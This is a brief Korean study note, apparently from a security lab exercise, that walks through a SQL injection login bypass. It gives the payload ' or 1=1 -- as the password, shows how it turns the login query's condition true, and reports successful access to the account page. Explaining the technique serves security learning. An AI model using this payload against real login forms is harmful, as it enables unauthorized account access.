사용자 로그인 입력 값에 공격 문자열을 삽입하여 로그인 우회 공격 시도 (’ or 1=1 --)
예상 사용 SQL 문
”SELECT * FROM Members WHERE user_id = ‘id’ AND passwd = ‘pw’”;
•
id, pw 입력
◦
id = admin, pw = ‘or 1=1 --
예상 SQL 문 변화
”SELECT * FROM Members WHERE user_id = ‘admin’ AND passwd = ‘’ or 1=1--’”;
user_id = ‘admin’ AND passwd = ‘’ ⇒ False
1=1 ⇒ True 이기 때문에
user_id = ‘admin’ AND passwd = ‘’ or 1=1 ⇒ FALSE or TRUE ⇒ True 가 나오게 된다
•
공격 결과
로그인 성공하여 마이페이지 확인 가능
